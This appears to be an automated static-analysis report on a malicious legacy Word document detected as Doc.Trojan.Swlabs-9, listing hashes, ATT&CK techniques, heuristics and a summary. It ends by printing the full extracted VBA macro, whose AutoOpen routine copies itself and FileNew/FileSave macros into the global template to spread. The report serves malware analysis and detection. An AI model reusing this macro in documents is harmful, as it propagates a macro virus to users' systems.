Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 270270ff36c8c731…

MALICIOUS

Office (OLE)

34.5 KB Created: 2000-03-27 13:58:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 6c97bb1e6ae2091e5d977806756f930c SHA-1: 9413af239e0a0d0a667e390e9520a4dbbf36bfd2 SHA-256: 270270ff36c8c731382e0be3905e909ef7e61234b3769ff4bee074c0d66420d8
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros, specifically targeting AutoOpen and Auto_Close events. The AutoOpen macro attempts to copy itself and other macros (FileNew, FileSave) to the global template, likely to ensure persistence and execution on future document openings or saves. The ClamAV detection 'Doc.Trojan.Swlabs-9' further confirms its malicious nature. While the exact payload is not immediately clear from the provided script, the macro's intent is to establish persistence and potentially facilitate further malicious activity.

Heuristics 5

  • ClamAV: Doc.Trojan.Swlabs-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Swlabs-9
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1572 bytes
SHA-256: 50e8eed01e74629e5b9f3fec0d2f3a8fa82ef923791fbe371c6838bf6ecfad83
Detection
ClamAV: Doc.Trojan.Swlabs-9
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"

Public Sub MAIN()
Attribute MAIN.VB_Description = "Installs AutoClose and PayLoad macros to help prevent the spread and contraction of the prank macros. Also cleans out your Normal template and runs the CleanAll macro."
Attribute MAIN.VB_ProcData.VB_Invoke_Func = "TemplateProject.AutoOpen.MAIN"
Dim FName$
Dim MacName$

On Error GoTo -1: On Error GoTo ErrorHandler

     

     FName$ = WordBasic.[FileName$]()
     MacName$ = FName$ + ":AutoOpen"

     WordBasic.MacroCopy MacName$, "Global:AutoOpen"
     WordBasic.MacroCopy MacName$, "Global:FileNew"
     WordBasic.MacroCopy MacName$, "Global:FileSave"

ErrorHandler:

On Error GoTo -1: On Error GoTo AutoOpenHandler
     MacName$ = FName$ + ":AutoOpen"
     WordBasic.MacroCopy "Global:AutoOpen", MacName$
AutoOpenHandler:

On Error GoTo -1: On Error GoTo FileNewHandler
     MacName$ = FName$ + ":FileNew"
     WordBasic.MacroCopy "Global:FileNew", MacName$
FileNewHandler:

On Error GoTo -1: On Error GoTo FileSaveHandler
     MacName$ = FName$ + ":FileSave"
     WordBasic.MacroCopy "Global:FileSave", MacName$
FileSaveHandler:
    
WordBasic.FileSaveAs Format:=1



On Error GoTo -1: On Error GoTo 0:
On Error GoTo -1: On Error GoTo EndCode:



EndCode:

End Sub